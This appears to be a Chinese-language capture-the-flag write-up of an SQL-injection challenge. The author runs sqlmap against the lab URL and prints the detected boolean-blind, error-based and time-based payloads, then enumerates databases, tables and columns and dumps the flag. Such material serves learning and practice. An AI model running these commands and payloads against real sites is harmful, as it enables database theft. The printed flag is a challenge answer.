查看页面:
输个单引号会报错:
显然是 SQL 注入。
提示看看有没有什么捷径,你要说捷径的话,sqlmap?你不说我也会用 sqlmap 先跑一下,哈哈。
sqlmap -u "http://node4.anna.nssctf.cn:28069/index.php?id=1" --batch
-u URL, --url=URL Target URL (e.g. “http://www.site.com/vuln.php?id=1”) (指定 URL)
–batch Never ask for user input, use the default behavior (不再询问,默认执行)
返回结果:
sqlmap identified the following injection point(s) with a total of 223 HTTP(s) requests:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1142=1142 AND 'Bbac'='Bbac
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1149 FROM(SELECT COUNT(*),CONCAT(0x7162627171,(SELECT (ELT(1149=1149,1))),0x716b767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'thit'='thit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))HWge) AND 'SCoq'='SCoq
根据返回结果来看,可以用布尔盲注(boolean-based blind),报错注入(error-based),时间盲注(time-based blind) 。
不过既然都用 sqlmap 了,就不必在乎是哪种注入了,能跑通就行。
sqlmap -u "http://node4.anna.nssctf.cn:28069/index.php?id=1" --dbs --batch
–dbs Enumerate DBMS databases(查看所有数据库)
返回结果:
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] test_db
不过在 ctf 中,一般只需要查看当前数据库即可。
sqlmap -u "http://node4.anna.nssctf.cn:28069/index.php?id=1" --current-db --batch
–current-db Retrieve DBMS current database(查看当前数据库)
返回结果:
current database: 'test_db'
sqlmap -u "http://node4.anna.nssctf.cn:28069/index.php?id=1" -D test_db --tables --batch
-D DB DBMS database to enumerate(指定数据库)
–tables Enumerate DBMS database tables(查看所有表)
返回结果:
Database: test_db
[2 tables]
+---------+
| test_tb |
| users |
+---------+
sqlmap -u "http://node4.anna.nssctf.cn:28069/index.php?id=1" -D test_db -T test_tb --columns --batch
-T TBL DBMS database table(s) to enumerate(指定表)
–columns Enumerate DBMS database table columns(列举所有列名)
返回结果:
Database: test_db
Table: test_tb
[2 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| flag | varchar(50) |
| id | int(11) |
+--------+-------------+
sqlmap -u "http://node4.anna.nssctf.cn:28069/index.php?id=1" -D test_db -T test_tb -C flag --dump --batch
-C COL DBMS database table column(s) to enumerate(指定列名)
–dump Dump DBMS database table entries(列出当前列所有内容)
返回结果:
Database: test_db
Table: test_tb
[1 entry]
+----------------------------------------------+
| flag |
+----------------------------------------------+
| NSSCTF{5830169a-cff1-4daa-b648-6961414eb2fc} |
+----------------------------------------------+
之前使用 sqlmap 一直不太熟练,正好借此机会熟悉一下。